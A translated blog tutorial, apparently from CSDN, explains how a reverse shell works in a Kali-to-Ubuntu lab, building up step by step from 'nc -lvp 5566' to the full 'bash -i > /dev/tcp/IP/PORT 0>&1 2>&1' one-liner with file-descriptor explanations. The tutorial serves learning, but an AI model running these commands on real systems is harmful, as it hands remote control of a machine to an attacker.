Reverse shell: a concrete implementation

What is a reverse shell

A reverse shell means that the controlling end listens on some TCP/UDP port, while the controlled end initiates the connection to that port and hands the input and output of its command line over to the controlling end. A reverse shell is the counterpart of standard remote shells such as telnet and ssh; in network terms it is simply the client and server roles swapped.
That is a lot of terminology. Put simply: the victim's shell is handed to the attacker, who can then operate the victim's shell directly. Of course, the attacker must first obtain the ability to run a command on the victim by some other means.

Reverse shell experiment

Main commands:

nc -lvp PORT
# -l listen, -v verbose (print connection and error messages), -p port. nc is short for netcat; it can listen on any TCP/UDP port, i.e. act as a server listening on the given port over TCP or UDP. Note: some netcat builds (older OpenBSD netcat) reject -p together with -l; there, use nc -lv PORT.
bash -i
# -i interactive: start an interactive shell (bash).
/dev/tcp/IP/PORT
# A special "device file" (in Linux everything is a file). The file does not actually exist on disk; it is an interface implemented by bash itself for making network connections. Opening it amounts to a socket() call plus connect(); reading from and writing to it amounts to receiving and sending data on that socket. This only works in bash (not in sh/dash), and only if bash was built with network redirections enabled, as Debian/Ubuntu and Kali builds are.

Implementation process:
Attacker (kali): 192.168.56.105
Victim (ubuntu): 192.168.56.108
The attacker runs only one command, and it must be running before anything else. Each of the experiments below needs it started first, listening on port 5566 the whole time:

nc -lvp 5566

The victim then actively connects out to the attacker.
Below are four commands, built up step by step, that end with the attacker holding full control of the shell.
Before going on, you need some background on file descriptors:

1) In shell scripts the three most commonly used FDs (file descriptors) are:
	0, the file descriptor for standard input (stdin)
	1, the file descriptor for standard output (stdout)
	2, the file descriptor for standard error (stderr)
2) > is the redirection operator: it sends the output of what precedes it to the location that follows it.
3) & marks a file descriptor reference. Without & in front of the 1 or 2 (e.g. 2>1 instead of 2>&1), the number is treated as an ordinary file name.

1. Redirect standard output to the attacker machine

bash -i > /dev/tcp/192.168.56.105/5566

At this point the victim is connected to the attacker, but when the attacker types commands the victim does not react. When the victim types commands, the attacker receives their output. In other words:

This command only passes the output of commands the victim runs successfully to the attacker; the attacker cannot operate the victim at all. The victim, meanwhile, no longer sees normal command output in its own terminal, but it still sees error messages, because stderr (fd 2) was not redirected.

2. Redirect standard input to the attacker machine

bash -i < /dev/tcp/192.168.56.105/5566

At this point the victim is connected to the attacker, and when the attacker types commands the victim executes them, but the output appears on the victim's terminal; the attacker cannot see the command output.

This command makes the victim execute the attacker's input as shell commands, with the results displayed on the victim's terminal. If the victim types commands in its own terminal, nothing happens, because the shell's input now comes from the socket.

3. Redirect standard input and output to the attacker machine

bash -i > /dev/tcp/192.168.56.105/5566 0>&1

At this point the victim is connected to the attacker; the attacker types a command, the victim executes it, and the victim's terminal shows the command being read (bash echoes it on stderr). After execution the victim's terminal does not show the output, but a wrong command still shows its error message there.

This command hands the shell's input and output to the attacker, but error output is not transferred. If the victim types commands in its own terminal, nothing happens. Note that the order matters: > /dev/tcp/... must come before 0>&1, because fd 1 has to be the socket already when fd 0 is duplicated from it.

4. Redirect standard input, output and error to the attacker machine

bash -i > /dev/tcp/192.168.56.105/5566 0>&1 2>&1

At this point the victim is connected to the attacker; the attacker types commands, the victim executes them, and the victim's terminal shows neither the commands nor any output or error messages.

This command hands the shell's input and output to the attacker, and error output is transferred as well, so the shell is completely controlled by the attacker.

Epilogue

I got a bit confused as I wrote this, and I don't know how to read the link below; I referred to what they made. QAQ

https://zhuanlan.zhihu.com/p/138393396

Origin blog.csdn.net/weixin_44411509/article/details/118959910